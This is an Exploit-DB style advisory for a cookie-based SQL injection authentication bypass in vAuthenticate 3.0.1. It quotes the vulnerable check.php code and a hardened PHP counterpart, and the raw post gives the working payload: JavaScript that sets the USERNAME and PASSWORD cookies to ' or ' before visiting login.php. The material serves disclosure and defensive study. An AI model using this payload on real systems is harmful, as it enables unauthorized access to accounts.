Vendor: vAuthenticate
By: bd0rk
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: vAuthenticate
Affected Version From: 3.0.1
Affected Version To: 3.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:beanbug:vauthenticate:3.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WinVista & Ubuntu-Linux
Year: 2011

vAuthenticate 3.0.1 Auth Bypass by Cookie SQL Injection Vulnerability

A vulnerability exists in vAuthenticate 3.0.1 that allows an attacker to bypass authentication by setting the USERNAME and PASSWORD cookies to ' or ' and then using the login.php page. The cause is the vulnerable code in check.php, which does not properly sanitize user-supplied input before it is used in an SQL query.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner.
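
A hardened counterpart of the check.php logic, as an added example (not code from vAuthenticate or from the advisory): the cookie values are validated and then handed to the database as bound parameters. The page does not show the query inside page_check(), so the table authuser, its columns uname and passwd, the helper cookie_check(), the assumption that the PASSWORD cookie holds the same representation as the stored value, and the in-memory SQLite data are all constructed for this demonstration.

```php
<?php
// Added example, not vAuthenticate code. Assumed names: table authuser,
// columns uname/passwd, cookie_check(); the SQLite data is constructed.

function page_check(PDO $db, string $username, string $password): bool
{
    // Input validation: allow-list the account name; quotes never pass.
    if (!preg_match('/\A[A-Za-z0-9_.-]{1,64}\z/', $username)) {
        return false;
    }
    // Bound parameter: the value travels as data, not as SQL text, so it
    // cannot change the WHERE clause even if validation were loosened.
    $stmt = $db->prepare('SELECT passwd FROM authuser WHERE uname = :uname');
    $stmt->execute([':uname' => $username]);
    $stored = $stmt->fetchColumn();
    if ($stored === false) {
        return false; // unknown user: fail closed
    }
    // Constant-time comparison against the stored value.
    return hash_equals((string) $stored, $password);
}

function cookie_check(PDO $db, array $cookies): bool
{
    // Same gate as check.php, but only plain strings are accepted
    // (a cookie sent as USERNAME[]=x arrives as an array).
    $u = $cookies['USERNAME'] ?? null;
    $p = $cookies['PASSWORD'] ?? null;
    return is_string($u) && is_string($p) && page_check($db, $u, $p);
}

// Constructed in-memory database so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE authuser (uname TEXT PRIMARY KEY, passwd TEXT)');
$db->exec("INSERT INTO authuser VALUES ('alice', 'constructed-secret')");

$cases = [
    'cookie values from the advisory' => ['USERNAME' => "' or '", 'PASSWORD' => "' or '"],
    'valid constructed account' => ['USERNAME' => 'alice', 'PASSWORD' => 'constructed-secret'],
    'no cookies' => [],
];
foreach ($cases as $label => $cookies) {
    printf("%-32s %s\n", $label, cookie_check($db, $cookies) ? 'allowed' : 'denied');
}
```

In check.php itself the gate would be called as cookie_check($db, $_COOKIE).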

Exploit-DB raw data:

-----------------------------------------------------------------------

vAuthenticate 3.0.1 Auth Bypass by Cookie SQL Injection Vulnerability

-----------------------------------------------------------------------

Author: bd0rk

Contact: bd0rk[at]hackermail.com

Date: 2011 / 08 / 30

MEZ-Time: 01:35

Tested on WinVista & Ubuntu-Linux

Affected-Software: vAuthenticate 3.0.1

Vendor: http://www.beanbug.net/vScripts.php

Download: http://www.beanbug.net/Scripts/vAuthenticate_3.0.1.zip

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Found vulnerable code in check.php:

if (isset($_COOKIE['USERNAME']) && isset($_COOKIE['PASSWORD']))
    {
        // Get values from superglobal variables
        $USERNAME = $_COOKIE['USERNAME'];
        $PASSWORD = $_COOKIE['PASSWORD'];

        $CheckSecurity = new auth();
        $check = $CheckSecurity->page_check($USERNAME, $PASSWORD);
    }
    else
    {
        $check = false;
    }

	if ($check == false)
	{

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Exploit: javascript:document.cookie = "[USERNAME]=' or '; [PATH]";

         javascript:document.cookie = "[PASSWORD]=' or '; [PATH]";


Then use login.php 4AuthBypass :P

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



---Greetings from hot Germany, the 22-year-old bd0rk. :-)

Special-Greetz: Zubair Anjum, Perle, DJTrebo, Anonymous, GolD_M, hoohead